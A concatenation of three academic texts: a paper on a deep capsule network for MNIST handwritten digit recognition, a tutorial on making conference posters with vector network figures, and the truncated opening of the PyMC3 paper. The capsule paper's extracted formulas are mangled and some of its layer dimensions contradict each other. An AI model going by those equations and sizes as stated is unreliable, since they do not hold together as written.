Nerve Capsule; Deep Capsule Network; Handwritten Digit Recognition I. INTRODUCTION In our daily life, handwritten numbers are very common, but in many areas of work, the part about numbers is sometimes very cumbersome, such as data collection, which is a time-consuming, large amount of work. At this time, the function of handwriting recognition technology is reflected, which brings convenience and efficiency to human. The proposal of nerve capsule comes from a assumption of Hinton[1]: instead of using a group of coarse coding or single neurons to represent the relationship between the observer and the object similar to the object's posture information, a set of activated neurons is selected to represent it. This group of neurons is called nerve capsule. One of the advantages of capsule network is that it needs less training data than convolutional neural network, but the effect is not inferior to it. For the traditional neural network, neurons can not represent multiple attributes at the same time, resulting in the activation of neurons can only represent a certain entity. In this way, the nature of the entity will be hidden in a large number of network parameters. When adjusting the network parameters, we can not guarantee the pure motivation. It must take into account the input of all kinds of samples, so it is inevitable to adjust the parameters in a troublesome and time-consuming manner. After the application of vector neurons, we will be able to determine the existence of all the properties wrapped in a capsule, in the adjustment of parameters, such constraints will be greatly reduced, the best parameters are easy to obtain. The design and research of artificial neural network largely borrows from the structure of biological neural network. In the field of neurolysis, a conclusion has been drawn that there are a large number of cortical dominant structures in the cerebral cortex of most primates. There are hundreds of neurons in the cortex of most primates, and there are also hierarchical structures in it. These small units can handle different types of visual stimuli well. The researchers speculate that there is a mechanism in the brain that combines low-level visual features with some weight values to construct a colorful world in our eyes. Based on this discovery in biology, Hinton suggests that it is more appropriate to try to replace the relationship between the object and the observer with a series of active neurons instead of one. So, there is the nerve capsule mentioned earlier. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 2 In October 2017, Sabour, Hinton and others published the topic "Dynamic Routing Between Capsules "[10] at a top-level conference on machine learning called "NIPS" and proposed Capsule network (CapsNet). This is a deep learning method that shakes the whole field of artificial intelligence. It breaks the bottleneck of convolutional neural network (CNN) and pushes the field of artificial intelligence to a new level. This paper focuses on the recognition of MNIST data set based on capsule network. MNIST[7] is a data set composed of numbers handwritten by different people. Although handwritten digits in BP neural network[9] and convolution neural network[2][5][6][11] have a certain good recognition effect, but the emergence of capsule network brings a new breakthrough to the recognition of data sets, and has a better recognition effect, and it’s recognition accuracy greatly exceeds the convolutional neural network. II. RELATED WORK The neural capsule proposed by Hinton is to implement ontology from the perspective of philosophy. The various properties of a particular entity are represented by the activity of nerve cells in an activated capsule. These attributes include the size, location, orientation and other information of the entity. From the existence of some special attributes, we can infer the existence of instances. In the field of machine learning, the probability of entity existence is represented by the output size of independent logistic regression unit. In the neural capsule, the norm obtained by normalizing the output high-order vector represents the existence probability of the entity, and the attributes of the entity are represented by various "posture" of the vector. This reflects the essence of ontology, that is to define the existence of entity according to its various attributes. In the research of capsule network, the working process of capsule network is closer to the behavior of human brain because of its less training data. In the aspect of white box adversarial attacks, capsule network shows strong resistance. Under the effect of the fast gradient symbol method, the accuracy can still be maintained above 70%. The accuracy of training and testing on MNIST is better than that of convolution neural network. In some practical applications, such as in specific text classification tasks, convolution capsule network can effectively improve the accuracy of feature extraction. [12]Chinese scholars have also applied the visual reconstruction method based on capsule network structure in the field of functional magnetic resonance imaging. In the intelligent traffic sign recognition, by introducing pooling layer into the main capsule layer, the super depth convolution model improves the feature extraction part of the original network structure, and uses the moving index average method to improve the dynamic routing algorithm, which improves the recognition accuracy of the network in the field of traffic sign recognition. The capsule network first appeared in the article "Dynamic routing between capsules" published by Hinton et al. in October 2017. Based on the capsule network proposed by Sabour et al in 2017, an improved version of the new capsule system was proposed in the article "Matrix Capsules with EM Routing"[3] published in 2018. In this system, each encapsulated capsule uses a logical unit to represent the presence or absence of an entity. A 4×4 pose matrix is used to represent the pose information of the entity. In this paper, the iterative routing method between capsule layers based on EM algorithm is mentioned. The output of the lower layer capsules reaches the higher level capsules through routing algorithm, so that the activated capsules get a group of similar pose voting. The new system is much more resistant to Lily attacks than baseline CNN. In the paper "Stacked Capsule Autoencoders"[4] published in 2019, an unsupervised capsule automatic encoder (SCAE) is introduced. By observing the neural encoders of all components, the existence and pose information of the target can be inferred, that is to say, the object can be inferred explicitly through the relationship between the components. The accuracy on SVHN[8] and MNIST datasets is 55% and 98.5%, respectively. III. Deep capsule network A. Structure of deep capsule network 1) Encoder structure of deep capsule network Figure 1. Network structure of deep capsule Conv1: Standard convolution. It is dedicated to extract some low-level feature information from the input image. The preprocessing data layer of capsnet is to convert the brightness of pixels in the input layer into local feature output. The input image of this layer is 28×28, with 256 convolution kernels with step size of 1 and size of 9×9. After convolution, the output is a International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 3 three-dimensional array. By reshaping the array, the appropriate feature vector of position information is constructed for each dimension. The final output is a tensor of 20×20×256. Conv2: Standard convolution layer, including 256 convolution cores with step size of 1 and size of 5×5, input tensor of 20×20×512 and output of tensor of 16 ×16×256. Primary capsule: primary capsule layer, also known as the primary capsule layer, is in a low-level stage, multidimensional entities are described in capsnet from the perspective of "inverse graph". It is a reverse rendering process, that is, this layer can combine the low-level features detected by the previous layer. This layer is still committed to extracting feature information, so it still belongs to convolution layer. The object of convolution is changed from single neuron to capsule with larger granularity, which is the difference between convolution network and convolution network. The primary capsule layer is the convolution layer of "capsule version". This stage is also where the capsule really begins. This layer consists of 32 main capsules, each of which contains 8 convolution kernels of 9×9 ×256 with step size of 2. According to the above, the tensor of 6× 6×8×32 is obtained by inputting 20× 20×256 tensors in this layer. Digitcaps: Digital capsule layer, also the full connection layer of capsule network. Using a fully connected topology, the capsules in this layer will connect all outputs of the previous primary capsule layer. Because this paper finally realizes the recognition of 0-9, so there are 10 capsules in this layer. The norm of each activation vector represents the probability of each classification and is used to calculate the classification loss. The input received by this layer is the tensor of 6×6 ×8×32 of the output of the previous layer, and the output is a matrix of 16×10. Finally, the capsule network is compared with the improved deep capsule network as shown in the following table 1: 2) Decoder structure The decoder structure in this paper is the same as capsnet, as shown in the figure. The goal of capsnet model optimization is to calculate the edge loss for each number to allow multiple numbers to exist at the same time. In addition, capsnet can reconstruct the input image based on the instantiation parameters obtained by previous processing. In the training process of image reconstruction, only the activated capsules are allowed to participate in the adjustment of three-level fully connected network at each time. The structure mainly responsible for reconstructing the image is the decoder, which receives a 16 × 10 matrix from the digital capsule layer, reconstructs a 28×28 image after three full connection layers. TABLE I. STRUCTURE COMPARISON OF CAPSULE NETWORK AND DEEP CAPSULE NETWORK Capsule network Deep capsule network Convolution layer Conv1: 256*9*9 Conv1: 512*9*9 Conv2: 256*5*5 Primary Capsule 9*9 5*5 Digit Capsule One time dynamic routing Three iterations Twice dynamic routing The main route has three iterations, and the secondary route has three iterations FC Figure 2. Decoder network B. Working mechanism of dynamic routing In this paper, there are two routes, the primary route and the secondary route, but both are the same dynamic path structure. It is used to ensure that the output of the capsule is only delivered to the appropriate parent node, which is similar to the idea of "focusing on Cultivation". It is necessary for the lower layer capsule i to know how to deliver its output vector to the higher- level capsule j. At this time, it is necessary to evaluate the coupling degree between the low-level capsules and the high-level capsules. This is represented by the scalar weight CIJ, which is the importance. In this high-dimensional vector space, in order to describe the spatial relationship of different parts of the entity, each capsule is set with corresponding weight. An affine transformation matrix, which is composed of several weight vectors, an affine transformation matrix is generated. After transforming the matrix, we can get the j prediction vector �̂�j|i of each low-level capsule I to a high-level capsule. On the level of possible International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 4 advanced capsules, the prediction vector �̂�j|i=Wijui is obtained by multiplying the weight matrix Wij with the output ui of low-level capsules. The prediction vector provides instance parameters for the capsule of high- level, and the higher-level capsule will be activated when the information provided by multiple prediction results is consistent.�̂�j|i=Wijui The low-level neural capsule I is connected with any high-level capsule J which has a "coupling" relationship with it. By multiplying the corresponding coupling coefficient Cij with the j prediction vector �̂�j|i of each low-level capsule I for the high-level capsule, and then weighted sum operation, the output Sj can be obtained. The output of the capsule in the next round is a high-dimensional vector vj, which is obtained by squash extrusion function on Sj. The calculation formula is as follows. 𝑆𝑗 = ∑ 𝐶𝑖𝑗 ∙𝑖 �̂�𝑗|𝑖 For an intermediate layer capsule, the input is a vector and the output is also a vector, but the input process for it is two stages: 1) Linear combination: For a linear combination of neurons, the connection weights between capsules are represented by a matrix instead of a scalar value in the form of a vector. 2) Dynamic routing:The core work of this stage is to determine the close relationship between high level j and low level I, that is to find the most suitable coupling coefficient value Cij, which is determined in the repeated process of dynamic routing algorithm. C. Dynamic routing algorithm The process of dynamic routing algorithm is as follows: a. Softmax processes data b. Predict the output c. Weighted sum d. Compress the vector e. Update coupling coefficient The following figure 3 is a description of the dynamic routing algorithm. Figure 3. Dynamic routing algorithm 1) The three input parameters are �̂�j|i (prediction vector from i to j), r (number of iterations of routing algorithm) and 𝒍 (number of layers of capsule). 2) For all layers of 𝒍 capsules and (𝒍 + 1) capsules 𝑏𝑖𝑗 ← 0 For all layers of 𝒍capsules and (𝒍 + 1)capsules, the prior probability coefficient bij of two adjacent layers is initialized to 0, and its value will be used in the iterative update process of bij. After the iteration, the value is stored in the corresponding Cij. 3) Iteration with r 4) The softmax rule is used to calculate the Cij between the lower and higher layers. In the beginning, because all bij are initialized to zero, so the obtained Cij is also equal. That is to say, in this period, every node in the lower layer is equally important for the high-level capsule. The parent node at the higher level receives all the information from the lower level capsule. This kind of confusion in the initial stage of the algorithm will gradually become clearer in the later iterative calculation. 5) The weighted sum of high-level capsules was calculated. The weight of the combination used is the Cij obtained in the previous step. 6) Sj is a vector with a size and a direction. However, if you want its length to be used as the probability of the existence of the entity, you need to normalize its size, and you need to use a nonlinear extrusion function to complete the normalization operation. This function retains the vector direction, and at the same time, the module length of the vector can be compressed within 1, so the output is the output of the high-level capsule 7) The coupling between capsules is dynamic. According to the formula, the larger the result value of �̂�j|i∙Vj, that is, the more identical the pose information V1Σ c11 c12 c1n S1 Squash V2Σ S2 Squash r=3 r=3 VnΣ Sn Squash r=3 U1 U2 Un LowerCaps Vector . . . b11 b12 b1n b21 b22 b2n bnn U1 U2 Un . . . HigherCaps Vector u1/1 u1/2 u1/n ... ... c21 c22 c2n u2/1 u2/2 u2/n ... ... cn1 cn2 cnn un/1 un/2 un/n ... ... ... International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 5 of �̂� j|i and Vj,the greater the value of bij, which indicates that the coupling degree between the previous layer capsule i and the high-level capsule j is higher Dynamic routing algorithm focuses on clustering similar parts together, and then forms a larger granularity identification module. If the predicted vector �̂�j|i and the output Vj of one of the high-level capsules are calculated by dot product and the result is very large, the relationship between nodes in this layer and high-level capsules will be strengthened after a reflection from front to back, that is to say, the coupling coefficient will be increased. At the same time, reduce the coupling coefficient with other high- level capsules. After r iterations, count the output of all high-level capsules, and determine the relevant routing parameters. The forward propagation will enter the next capsule layer of the capsule network. D. loss function The traditional cross entropy function only supports the scenario of one classification, so this function is not suitable for capsule network. In order to distinguish multiple classifications in a picture, the edge loss function is used to achieve the objective function of model optimization for each digital capsule k. It is shown in the following formula. 𝐿𝑘 = 𝑇𝑘𝑚𝑎𝑥(0, 𝑚 + − ||𝑣𝑘||) 2 + 𝜆(1 − 𝑇𝑘)𝑚𝑎𝑥⁡(0, ||𝑣𝑘|| − 𝑚−) 2  (2) In the above formula, Tk is the function of classification, k is the classification, the value of Tk is related to the existence of the k-th classification, Lk is the calculated loss. If and only if the k classification exists, Tk is 1; if there is no k classification, Tk is 0.|| 𝒗𝒌 ||Represents the length of 𝒗𝒌 , which is the probability that the number k exists.𝑚+ , 𝑚_ are the threshold functions indicating the strength of the connection between the capsules .When it is lower than 0.1, it is considered that there is no connection relationship at all, and it is regarded as complete connection if it is higher than 0.9. In detail, 𝒎+ is the upper edge threshold, which is used to deal with the situation that the classification does not exist but exists in the prediction; ⁡𝒎− is the lower edge threshold, which deals with the situation that the classification does exist but is not predicted by the network. 𝝀 is called the sparsity coefficient and is used to adjust the weight between the two thresholds to adjust the parameters and steps. The values of 𝝀 are 0.9, 0.1 and 0.5. Add the loss Lk of each number to get the overall loss of the network. IV. EXPERIMENT A. Experimental environment TABLE II. EXPERIMENTAL ENVIRONMENT Operating system Windows10(RAM16.0GB） CPU Intel(R)Core(TM)i7-9750H GPU NVIDIA GeForce GTX 1660 Ti Dataset MNIST Other pytorch1.5.0+cu101 python 3.7.7 B. Experimental data analysis Handwritten digital machine vision database is widely used in image recognition and classification. The sample image in MNIST is 28 × 28 pixels, including four files: training set image, training set label, test set image and test set label. These files are binary files, each pixel of which is converted to a number between 0 and 255, where 0 is white and 255 is black. The training set has 60000 handwritten training samples. Its function is to fit model parameters, such as calculating offset and weight. The test set has 10000 samples, and its function is to test the final effect of the model. 1) Precision of capsule network test Figure 4. Test precision chart of capsule network under 50 epochs As shown in Figure 4, the highest accuracy of this training is 99.55% in the 44th epoch. 2) Test precision of deep capsule network Figure 5. Test accuracy chart of deep capsule network under 50 epochs International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 6 As shown in Figure 5, the highest accuracy of this training is 99.62% in the 43rd epoch. 3) When epoch = 30, the final test accuracy of capsule network is 99.46% Figure 6. Test precision chart of capsule network under 30 epochs 4) When epoch = 30, the final test accuracy of deep capsule network is 99.58% Figure 7. Test accuracy chart of deep capsule network under 30 epochs 5) Accuracy comparison between deep capsule network and capsule network Figure 8. Comparison between the accuracy of capsule network and deep capsule network As shown in Figure 8, it can be seen that the test accuracy of the deep capsule network in a short epoch increases faster than the accuracy of the capsule network and the recognition accuracy is also higher, under the same conditions. 6) Performance of deep capsule networks with the same two routes: 1,2,3,4 Figure 9. Impact of changing the number of routing iterations on the deep capsule network As shown in the Figure 9, it shows that the number of route iterations is not the more the better, which should be obtained according to the specific experiment of network structure. In a smaller training period, It is more appropriate to select the number of iterations of the primary route 2 times and the number of iterations of the secondary route 3 times. When the two routing iterations are different as to Figure 10. Figure 10. Influence of different iteration times of two routes on deep capsule network Figure 11. Influence of the same number of two routing iterations on deep capsule network International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 7 As shown in the Figure 11, the training time and classification accuracy of the network are compared under different collocation times of "primary route" and "secondary route". From the analysis of the data in the table, if only from the classification accuracy, the combination of "main route" iteration twice and "secondary route" iteration three times is the best, but the training time is long. If the training time and classification accuracy are considered comprehensively, the primary route is best to be iterated once and the secondary route is iterated twice. C. Reconstruction In order to understand the reconstructed picture, use the imshow function of matplotlib to draw and visualize, then the input picture 12 and the reconstructed picture 13 are shown in the following figure: Figure 12. Schematic diagram of some pictures in MNIST database Figure 13. Schematic diagram of reconstructed image From the comparison, we can see that the reconstructed digital image is clearer and smoother than the input image. It can be inferred that the reconstructed image has the function of smoothing noise. D. Separation of overlapping handwritten numerals In the same way, we train the overlapped handwritten digital images with deep capsule network, and finally put the vectors into the decoder to decode the reconstructed images. Some of them are shown in figure 14, and the separation effect is basically accurate. Figure 14. Comparison of input and output images of the network Figure 15 shows the three separation effects' 0 'and' 1 ',' 3 'and' 4 ', ' 0 'and' 9 '. It is obvious that the network has been able to separate two completely coincident handwritten digits. Even if' 3 'and' 4 'overlap and it is difficult for human eyes to separate them, the network can still successfully separate them, with an accuracy rate of 93.53% .The accuracy rate of collaterals was only 88.10%. Figure 15. Partial reconstruction results of the improved network Figure 16. Improved partial error reconstruction results However, the situation shown in Figure 16 still exists in the reconstructed picture. The original overlapping picture is the overlap of the numbers '9' and '4'. The two reconstructed images are like '9', without '4', the reconstruction is wrong, the error rate after the improvement is still 6.47%. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 8 V. CONCLUSION The deep capsule network model in this paper is based on the characteristics and shortcomings of the capsule network. On the one hand, it retains the advantages of capsule network in understanding the attitude of objects; on the other hand, in view of the shortcomings of capsule network, the convolution kernel size of convolution layer is optimized, and the dynamic routing process is improved to twice routing. The final deep capsule network not only retains the advantages of traditional capsule network, but also improves the performance. REFERENCES [1] Hinton G E, Krizhevsky A, Wang S D. Transforming auto- encoders[C]//International Conference on Artificial Neural Networks. Springer, Berlin, Heidelberg, 2011: 44-51. [2] He K, Zhang X, Ren S, et al. Deep residual learning for image recognition[C]//Proceedings of the IEEE conference on computer vision and pattern recognition. 2016: 770-778. [3] Hinton, Geoffrey E.; SABOUR, Sara; FROSST, Nicholas. Matrix capsules with EM routing. 2018. [4] Kosiorek A, Sabour S, Teh Y W, et al. Stacked capsule autoencoders[C]//Advances in Neural Information Processing Systems. 2019: 15512-15522. [5] Krizhevsky A, Sutskever I, Hinton G E. Imagenet classification with deep convolutional neural networks[C]//Advances in neural information processing systems. 2012: 1097-1105. [6] LeCun Y, Bottou L, Bengio Y, et al. Gradient-based learning applied to document recognition[J]. Proceedings of the IEEE, 1998, 86(11): 2278-2324. [7] LeCun, Yann, Corinna Cortes, and Christopher JC Burges. "The MNIST database of handwritten digits, 1998." URL http://yann. lecun. com/exdb/mnist 10 (1998): 34. [8] Netzer, Yuval, et al. "Reading digits in natural images with unsupervised feature learning." (2011). [9] Rumelhart D E, Hinton G E, Williams R J. Learning representations by back-propagating errors[J]. Nature, 1986, 323(6088): 533-536. [10] Sabour S, Frosst N, Hinton G E. Dynamic routing between capsules[C]//Advances in neural information processing systems. 2017: 3856-3866. [11] Szegedy C, Liu W, Jia Y, et al. Going deeper with convolutions[C]//Proceedings of the IEEE conference on computer vision and pattern recognition. 2015: 1-9. [12] Zhao W, Ye J, Yang M, et al. Investigating CapsuleNetworks with Dynamic Routing for Text Classification[J].arXiv preprint arXiv:1804.00538, 2018 work_tdwmpi6kwvhcfluez2l5gq6ejm ---- Microsoft Word - Volume37_final insna.org | Issues 1&2 | Volume 37 | 95 Creating a Conference Poster with High-Resolution Network Figures Jürgen Pfeffer Technical University of Munich Bavarian School of Public Policy Abstract Creating a poster with high-resolution network images can be a challenging task. In this arti- cle, the process of exporting a network figure from a network analysis tool, importing it in a vector graphics tool, and preparing the poster for print is discussed. The steps include critical strategies for producing print-quality figures that also apply to the preparation of network fig- ures for journal publication. We discuss different file formats and argue that the favorite tool for creating conference posters – Microsoft PowerPoint – is not suitable for posters that in- clude network figures. Instead, we suggest the use of Inkscape, a free and open-source tool, or a comparable vector graphics tool to prepare your posters. The goal of this article is to provide a tutorial-like description of the critical steps for creating a conference poster with high- resolution network figures. Author Jürgen Pfeffer is Professor of Computational Social Science and Big Data at the Bavarian School of Public Policy at Technical University of Munich. His research deals with the analy- sis of large and dynamic social, political and economic systems as well as with methodologi- cal, algorithmic and theoretical challenges arising from these analyses. Pfeffer’s work is at the interface between social sciences and computer sciences. Connections Creating a Conference Poster 96 | Volume 37 | Issues 1&2 | insna.org 1. Introduction Visualization is crucial for the develop- ment of a scientific field (Crosby, 1998; Freeman, 2000). Network visualizations are great ways to present the results of sci- entific projects. Much of the attention of research related to network visualization has focused on positioning the nodes in the figure, i.e. the layout of the network (Brandes, Freeman & Wagner, 2013; Eades, 1984). Recently, the focus of inter- est in the context of network visualization has shifted to using visual elements for mapping multivariate information to net- work images (Hennig, Brandes, Pfeffer & Mergel, 2012; Krempel, 2005, 2011; Pfef- fer, 2017). However, when it comes to creating a poster with a network figure, these map- ping strategies cover only some of the nec- essary steps. Table 1 shows the entire pro- cess of creating a network poster from pre- processing the network data to completion of the poster by the print shop. In this arti- cle we discuss the technical details of the points “Export Figure,” “Import Network Figure” in a vector graphics tool, and also “Save Poster for Printing.” We also offer short comments on “Transfer Poster File to Printer”. These crucial steps for creating a poster with a high-resolution network fig- ure are described below. It is important to notice that all of these steps are essential and not optional. We do not discuss gen- eral aspects of poster layout, e.g. arranging text and figures; the focus is on the quality of the network figures on the poster. Most of the strategies discussed here also apply to preparing network fig- ures for print publications. In poster crea- tion, many roads can lead to success (or failure). In the following, several decisions have been made and, for the sake of sim- plicity, only a few of the possible alterna- tives are discussed. The goal here is to provide a tutorial text that will work for most scholars irrespective of their current knowledge or experience. Table 1: Workflow of creating a poster with a network figure. Steps in bold are discussed in this text. 2. Export Network Figure The first challenge is to save your network figure in your favorite SNA tool as a vec- tor graphics file. In vector graphics, net- work drawings are stored as polygons. In other words, a circular node is stored with x/y coordinates, as well as with the radius and the color information for filling the circle. A link is stored with both pairs of x/y coordinates of the nodes that this link is connecting. When this file is read and the network is drawn, it literally gets drawn circle by circle and line by line. In contrast, raster format files were developed to store images created from photos. Stor- ing a photo can be imagined as putting a raster over the image and storing infor- mation for every cell (pixel) of this raster. While this is a fine approach for storing images from digital cameras, the right- hand images in Figure 1 show the problem that results when storing network figures. Images that may look good on screen can have very poor resolution on a poster, Pre-Processing  SNA Tool  Vector Graphics Tool  Poster Printing • Prepare Network Data • Create Layout • Import Network Figure • Transfer Poster File • Prepare Attributes • Map Information • Create Poster • Print Poster • Import Data • Export Figure • Save Poster for Printing • Get Poster to Conference Creating a Conference Poster Connections insna.org | Issues 1&2 | Volume 37 | 97 which will be much larger than the screen. The reason for the pixelated effect is that zooming a raster image merely makes the raster larger. On the other hand, a circle from a vector graphics file gets drawn larger by, literally, drawing a circle with a larger radius and a line stays a line, just with different coordinates. Consequently, you can endlessly zoom in at the vector graphics file without losing any resolution quality. Figure 1: A network node and a link stored in a vector graphics file (left) and in a raster file (right) Export as PDF/EPS. There are two very popular file formats for vector graphics: Adobe’s PDF (Portable Docu- ment Format), and EPS (Encapsulated PostScript). Although there are significant differences between these two file formats, they can be used interchangeably in current software programs. So, the first step in creating a poster with a decent network visualization is to export the network drawing as a PDF or EPS. There are also other file formats that will do the job, e.g. SVG (Scalable Vector Graphics) or even a format for three-dimensional graphics such as VRML (Virtual Reality Modeling Lan- guage). NetDraw, the visualization tool of UCINet (Borgatti, Everett, & Freeman, 2002), does not support PDF/EPS. Instead, with NetDraw, it is possible to export a network drawing as a “Metafile,” e.g. EMF (Enhanced Metafile) and (WMF) Windows Metafile. The logic of these file formats is similar to PDF/EPS, and most vector graphics tools (see next section) can import them. The decision on which to choose for your preferred file format will depend on positive answers to these three questions: Is the format made for vector graphics?25 Can my SNA tool export files with this format? Can my graphics tools import files with this format? If none of the above-mentioned file formats is available in your favorite net- work tool, then there is one last option: you can use a PDF creator tool, e.g. Adobe Acrobat or PrimoPDF, and print the net- work into a PDF. However, this approach is not always successful when it comes to the next step, described in the following section. Independently from how you ex- tract a vector graphics file from your fa- vorite SNA tool, this step is critical and cannot be bypassed. In other words, you should only use a tool that offers a vector graphics export option. If the tool you’ve selected does not offer that, you should not use it. Or, you could call upon the authors of the tool to add this feature! Never use JPG. There is one file format that should never be used for ex- porting network figures: JPG or JPEG, an acronym for Joint Photographic Experts Group, a committee that created this stand- ard. JPG files are often used for photos from cameras or phones because they compress the image data before storing it. The compression works well enough for photos because the human eye does not need to distinguish among a vast number of shades of blue to recognize the sky in a photo. But with network drawings, the JPG data compression has tremendous ill ef- fects on the quality of the figure. The most obvious distortion is that blurry areas will be drawn around lines as the JPG compres- sion algorithm tries to interpolate a gray area between the black line and the white background. PNG can be not so bad. If you are stuck with a tool that has no vector- 25 To answer this question, Google and Wikipedia can help. Connections Creating a Conference Poster 98 | Volume 37 | Issues 1&2 | insna.org graphics export option, you should export your network figure as PNG (Portable Network Graphics). Don’t be confused by the word network; PNG is a raster file for- mat and therefore not preferable for net- work drawings. However, the PNG is a lossless compression format, so that the blurry areas of the JPG can be avoided. The pixel effect from zooming (see Figure 1) is still an issue for PNG. This can be (in part) overcome by creating the PNG with high resolution – if the SNA tool offers this option. Raster graphics resolution is described in dpi (dots per inch). The hu- man eye needs about 300 dpi in order not to see the actual pixels. This means that a 1 x 1 inch area on paper should have 300 x 300 = 90000 pixels. When you use an im- age with 300 dpi for your poster and you re-size it to 500% to better fit your poster space, the area of pixels in the raster gets five times larger, resulting in an image with 134 dpi. At this resolution humans can easily discern pixels, and this reduces the visual quality of the network drawing on a poster. Consequently, 600 or even 1,200 dpi should be used – but this will create huge files. In a nutshell, then, while PNG files can create decent network imag- es, vector graphics files will always have better resolution and will look better on your poster. 3. Graphics Tools Here is the bad news. You cannot use PowerPoint (or its freely available emula- tions) for creating your poster because these tools cannot handle vector graphics files. Instead, we need to turn to tools that are optimized for vector graphics file for- mats. Adobe Illustrator is a widely used (but costly) tool for this purpose. However, there are freely available alternatives to Il- lustrator. For the purposes of this article we use Inkscape,26 as it is freely available for Windows, Mac, and Linux. An easy test for whether a tool qualifies for our purpose is to import the vector graphics 26 Download and tutorial: https://www.inkscape.org/ file that you have extracted as described above, and zoom in as far as possible on a single node. If you can still see a nicely drawn circle, then this tool can handle vec- tor graphic files. If you see pixels similar to the right-hand images of Figure 1, then this tool does not qualify for the task of creating a poster with a high-resolution network image. To bring into Inkscape a network drawing that is stored in a vector graphics file, select File/Import and import the net- work to your open poster document. Now, zoom in thousands of percentages to dou- ble-check the correct transfer of your vec- tor graphics-based network image. When you zoom out again and click on the net- work, you will see that the imported net- work is an object that can be moved around and changed in size. If you change the size make sure to hold the Ctrl key while doing that so as to preserve the height/width ratio of the image. Inkscape is very intuitive and many tutorials can be found online that will help you to add the additional text, logo, and other visual ele- ments needed for your poster. Handling accented characters. When you have finished your poster lay- out, make sure that you save it as a PDF as this is the preferred file format of poster print shops. There is one more trick that is especially important if your poster contains special fonts or non-English characters. If you select all objects of your poster (press Ctrl-a) and then select Path/Object to Path in the menu, then all text will also be trans- formed to paths, i.e. vector graphics ob- jects. Consequently, the poster printer can print your poster even if the language or font is not installed on the printer’s com- puter. Without this step, the print process could change your font and replace some characters with interesting-looking special characters. Transforming fonts to paths should be the very last step before storing the poster as a PDF for the print shop. Be aware that you cannot change any text af- ter this transformation step. Creating a Conference Poster Connections insna.org | Issues 1&2 | Volume 37 | 99 4. Poster Printing The process of actually printing the poster is straightforward if you have created a PDF in a similar way to the process de- scribed above. Here are some additional comments that should make your life easi- er and your poster more attractive:  Before starting to work on your poster, go to the conference website and figure out the size of the poster boards as well as whether the post- ers should be in portrait or land- scape orientation.  Spend the extra few bucks and go for the gloss paper – you will love it. In any case, try to avoid very thin (light) paper.  If the poster session is not during the first evening of the conference, think about printing the poster close to the conference venue. For instance, in the United States most FedEx shops print posters. Call a week before the conference and double-check that a) the print shop actually exists, b) it is at the place that Google tells you, and c) the person doing the prints will accept print orders via email or file down- load.  Good-quality posters can result in large PDF files. If your file is larger than 5MB, use a file transfer ser- vice, e.g. https://www.wetransfer.com/  Get a poster tube for transporting your poster – yes, these tubes can be part of your cabin luggage, no check-in necessary. But don’t let the poster sit in that tube for two weeks or it will become hard to un- roll. 5. An Example To illustrate the significant differences be- tween a vector graphics file and a raster format file we use a partial reproduction of a very old network visualization. In an ef- fort to create an encyclopedia of the natu- ral sciences, Georges-Louis Leclerc, Comte de Buffon, visualized dog breeds and their relationships (Buffon, 1755; Mayer, 2013). The left-hand image in Fig- ure 2 was created along the lines of the process described above. The result is a clearly printed high-resolution image that could also be printed in any size on a post- er. The right-hand side is a low-resolution JPG file that was enlarged for printing. One can easily see the effects described above: blurry lines and text as well as pixe- lation. This example also shows that the above-mentioned process is important for network figures in journal articles. Figure 2: Partial reconstruction of Buffon’s dog breeds and their relationships; comparison of printing quality of vector graphics file (left) and raster file (right). Connections Creating a Conference Poster 100 | Volume 37 | Issues 1&2 | insna.org References Borgatti, S.P., Everett, M.G. & Freeman, L.C. (2002). Ucinet for Windows: Software for Social Network Analysis. Harvard, MA: Analytic Technologies. Brandes, U., Freeman, L.C. & Wagner, D. (2013). So- cial Networks. In R. Tamassia, Handbook of Graph Drawing and Visualization (pp. 805–37). Boca Raton, FL: CRC Press. Buffon, G.-L.L., Comte de (1755). Histoire Naturelle, Générale et Particulière. Vol. 5 Le Chien avec ses variétés. Paris: Imprimerie Royale. Crosby, A.W. (1998). The Measure of Reality: Quan- tification in Western Europe, 1250-1600. New York, NY: Cambridge University Press. Eades, P. (1984). A Heuristic for Graph Drawing. Congressus Numerantium, 42(11), pp. 149–60. Freeman, L.C. (2000). Visualizing Social Networks, Journal of Social Structure, 1(1). Hennig, M., Brandes, U., Pfeffer, J., & Mergel, I. (2012). Studying Social Networks. A Guide to Em- pirical Research. Frankfurt: Campus Verlag. Krempel, L. (2005). Visualisierung komplexer Strukturen: Grundlagen der Darstellung mehrdimensionaler Netzwerke (Auflage: 1. Sonderband Auflage). Frankfurt am Main: Campus Verlag. Krempel, L. (2011). Network Visualization. In J. Scott & P.J. Carrington (eds.), The SAGE handbook of social network analysis (pp. 558–77). Thousand Oaks, CA: SAGE Publications. Mayer, K. (2013). Network visualization. Historical fragments of a visual culture. In M. Füllsack (ed.), Networking Networks, Origins, Applications, Ex- periments. University of Graz, AT: Institute of Systems Sciences, Innovation and Sustainability Research Report #3 (pp. 7–27). Pfeffer, J. (2017). Visualization of Political Networks. In: J.N. Victor, A.H. Montgomery, M. Lubell (eds.), The Oxford Handbook of Political Net- works. Oxford University Press, pp. 277–300. work_tfvl7qzf7jgyhlqbehmj5muepi ---- Submitted 9 September 2015 Accepted 8 March 2016 Published 6 April 2016 Corresponding author Thomas V. Wiecki, thomas.wiecki@gmail.com Academic editor Charles Elkan Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.55 Copyright 2016 Salvatier et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Probabilistic programming in Python using PyMC3 John Salvatier1, Thomas V. Wiecki2 and Christopher Fonnesbeck3 1 AI Impacts, Berkeley, CA, United States 2 Quantopian Inc, Boston, MA, United States 3 Department of Biostatistics, Vanderbilt University, Nashville, TN, United States ABSTRACT Probabilistic programming allows for automatic Bayesian inference on user-defined probabilistic models. Recent advances in Markov chain Monte Carlo (MCMC) sampling allow inference on increasingly complex models. This class of MCMC, known as Hamiltonian Monte Carlo, requires gradient information which is often not readily available. PyMC3 is a new open source probabilistic programming framework written in Python that uses Theano to compute gradients via automatic differentiation as well as compile probabilistic programs on-the-fly to C for increased speed. Contrary to other probabilistic programming languages, PyMC3 allows model specification directly in Python code. The lack of a domain specific language allows for great flexibility and direct interaction with the model. This paper is a tutorial-style introduction to 